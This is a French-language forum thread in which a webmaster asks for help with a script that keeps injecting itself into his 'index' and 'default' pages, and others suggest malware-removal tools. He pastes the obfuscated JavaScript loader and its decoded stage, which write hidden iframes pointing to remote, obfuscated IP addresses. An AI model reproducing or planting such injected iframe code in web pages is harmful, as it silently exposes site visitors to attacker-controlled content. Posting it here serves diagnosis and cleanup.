Par défaut code malicieux qui s'insére dans

nickg -  
 nickg -
Bonjour,
Depuis plusieurs mois je suis en guerre avec un virus dans mes pages web.

Regulièrement j'ai un script qui s'insére dans mes pages et qui bloque l'affichage des pages en questions.
Il revient tous les 8 jours environ et s'insére uniquement dans les pages nommées "default" ou "index" quelque soit l'extension : html, htm, asp

Au fur et à mesure le script grossit, il fait disparaitre mon code html. Si bien , lorsque qu'on appelle la page en question, c'est une page blanche qui s'affiche.
Régulièrement toutes les semaines je vérifie et je nettoie ce script
Voici le script en question :

<script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2
C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2
C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C11
0%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2
C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%
2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script <

Suite à un conseil, j'ai remplacé "eval" "par alert" pour décodé ce foutu code. A l'affichage de la page, une fenêtre s'ouvre avec :
if(!myia){ var i=
0;while((el=document.getElementsByTagName('iframe')).length){if(
(el[i].style.display=='none'|| el[i].style.visibility=='hidden'|| (el[i].width<5&&
el[i].height<5))&& el[i].name!=c1) {el[i].parentNode.removeChild(el[i]);}i++;}
d.write('<IFRAME name=c1
src=\'http://0XD1.%30XA0.0X48.%30XA7?'+Math.round(Math.random()*8877)+'87db\'width=33height=269 style=\'display:none\'></Iframe>');
}var myia=true;

Bien sur l'adresse correspondant un rien. J'ai rien trouvé comme solution avec l'ami google si ce n'est ça :
http://lists.virus.org/bugtraq-0304/msg00257.html (en anglais c'est pas mon truc)
https://www.hugedomains.com/domain_profile.cfm?d=geckozone&e=org (ca me dit pas grand chose
Mes question :
Comment un script peut s'incrire dans une page web sans que le webmaster ou les personnes qui gére le serveur soient au courant.?
comment faire pour éradiquer ce foutu virus ( ou autre chose) ?
Merci pour votre aide

2 réponses

  1. jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 041
     
    slt

    Télécharge Combofix de sUBs : Renomme le avant toute installation, par exemple, nomme le "KillBagle". aide ici : https://forum.pcastuces.com/sujet.asp?f=25&s=37315

    http://download.bleepingcomputer.com/sUBs/ComboFix.exe
    Sauvegarde le sur ton bureau et pas ailleurs !

    Aide à l’utilisation de combofix ici: https://bibou0007.forumpro.fr/login?redirect=%2Ft121-topic

    Double-clic sur combofix, Il va te poser une question, réponds par la touche 1 et entrée pour valider, laisse toi guider.
    Attends que combofix ait terminé, un rapport sera créé. Poste le rapport.

    ______________

    colle un rapport hijackthis

    http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download

    manuel :

    https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html

    Je conseille de renomer Hijackthis, pour contrer une éventuelle infection de Vundo.

    ex:Renomme le fichier HijackThis.exe en eden.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste

    Ensuite avec Explorer créer un dossier c:\hijackthis
    Décompresser Hijackthis dans ce dossier.
    C'est important pour les sauvegardes."
    0
  2. nickg
     
    bj,
    merci pour cette procédure, mais les pages sont chez un hébergeur.... Faut il que je rapatrie les pages virusées et que j'applique la procédure ?
    @+
    0